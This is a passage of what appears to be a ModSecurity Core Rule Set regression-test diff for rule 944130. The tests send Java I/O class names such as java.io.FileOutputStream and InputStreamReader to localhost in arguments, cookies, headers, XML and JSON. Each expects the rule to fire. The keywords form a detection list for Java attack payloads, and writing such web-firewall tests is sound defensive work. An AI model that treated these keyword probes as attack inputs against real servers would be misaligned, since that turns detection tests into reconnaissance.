keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-117 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-121 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "XML attribute value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-134 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Request header test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Argument test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 